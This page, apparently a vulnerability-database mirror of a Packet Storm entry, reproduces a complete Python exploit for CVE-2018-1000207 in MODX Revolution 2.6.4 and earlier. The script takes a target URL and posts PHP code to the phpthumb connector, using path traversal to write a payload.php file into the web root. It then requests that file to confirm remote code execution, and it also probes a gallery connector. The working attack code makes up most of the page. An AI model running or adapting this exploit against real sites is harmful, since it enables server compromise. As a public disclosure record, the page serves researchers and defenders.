Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormVitalii RudnykhPACKETSTORM:148597
HistoryJul 18, 2018 - 12:00 a.m.

Modx Revolution Remote Code Execution

2018-07-1800:00:00
Vitalii Rudnykh
packetstormsecurity.com
91

0.624 Medium

EPSS

Percentile

97.5%

JSON
`# Exploit Title: Modx Revolution < 2.6.4 - Remote Code Execution  
# Date: 2018-07-13  
# Exploit Author: Vitalii Rudnykh  
# Vendor Homepage: https://modx.com/  
# Version: <= 2.6.4  
# CVE : CVE-2018-1000207  
  
#!/usr/bin/env python3  
# -*- coding: utf-8 -*-  
import sys  
import os  
import requests  
from colorama import init, Fore, Style  
try:  
init()  
  
def cls():  
os.system('cls' if os.name == 'nt' else 'clear')  
  
cls()  
  
print(Fore.BLUE +  
'################################################################')  
print(Fore.CYAN +  
'# Proof-Of-Concept for CVE-2018-1000207 (Modx Revolution)')  
print('# by Vitalii Rudnykh')  
print('# Thanks by AgelNash')  
print('# https://github.com/a2u/CVE-2018-1000207/')  
print(Fore.BLUE +  
'################################################################')  
print('Provided only for educational or information purposes')  
print(Style.RESET_ALL)  
target = input('Enter target url (example: http(s)://domain.tld/): ')  
  
verify = True  
code = '<?php echo md5(\'a2u\'); unlink($_SERVER[\'SCRIPT_FILENAME\']);?>'  
  
if requests.get(  
target + '/connectors/system/phpthumb.php',  
verify=verify).status_code != 404:  
print(Fore.GREEN + '/connectors/system/phpthumb.php - found')  
url = target + '/connectors/system/phpthumb.php'  
payload = {  
'ctx': 'web',  
'cache_filename': '../../payload.php',  
'useRawIMoutput': '1',  
'src': '.',  
'IMresizedData': code,  
'config_prefer_imagemagick': '0'  
}  
  
r = requests.post(url, data=payload, verify=verify)  
check = requests.get(target + 'payload.php', verify=verify)  
if check.text == '9bdc11de19fd93975bf9c9ec3dd7292d':  
print(Fore.GREEN + 'Exploitable!\n')  
else:  
print(Fore.RED + 'Not exploitable!\n')  
else:  
print(Fore.RED + 'phpthumb.php - not found')  
  
if requests.get(  
target + '/assets/components/gallery/connector.php',  
verify=verify).status_code != 404:  
print(Fore.GREEN + '/assets/components/gallery/connector.php - found')  
url = target + '/assets/components/gallery/connector.php'  
  
payload = {  
'action': 'web/phpthumb',  
'f': 'php',  
'useRawIMoutput': '1',  
'IMresizedData': 'Ok',  
'config_prefer_imagemagick': '0'  
}  
r = requests.post(url, data=payload, verify=verify)  
if r.text == 'Ok':  
print(Fore.GREEN + 'Exploitable!\n')  
else:  
print(Fore.RED + 'Not exploitable!\n')  
  
else:  
print(  
Fore.RED + '/assets/components/gallery/connector.php - not found')  
  
except KeyboardInterrupt:  
cls()  
  
`

Related

dsquare 1
cve 1
osv 2
prion 1
exploitpack 1
exploitdb 1
github 1
impervablog 1
dsquare
dsquare
MODX Revolution < 2.6.4 File Upload
2018-09-28 00:00:00
cve
cve
CVE-2018-1000207
2018-07-13 18:29:00
osv
osv
CVE-2018-1000207
2018-07-13 18:29:00
MODX Revolution Incorrect Access Control vulnerability
2022-05-13 01:48:35
prion
prion
Improper access control
2018-07-13 18:29:00
exploitpack
exploitpack
Modx Revolution 2.6.4 - Remote Code Execution
2018-07-18 00:00:00
exploitdb
exploitdb
Modx Revolution &lt; 2.6.4 - Remote Code Execution
2018-07-18 00:00:00
github
github
MODX Revolution Incorrect Access Control vulnerability
2022-05-13 01:48:35
impervablog
impervablog
The Worldโ€™s Most Popular Coding Language Happens to be Most Hackersโ€™ Weapon of Choice
2018-09-26 16:18:36

0.624 Medium

EPSS

Percentile

97.5%

JSON
Related for PACKETSTORM:148597
dsquare1cve1osv2prion1exploitpack1exploitdb1github1impervablog1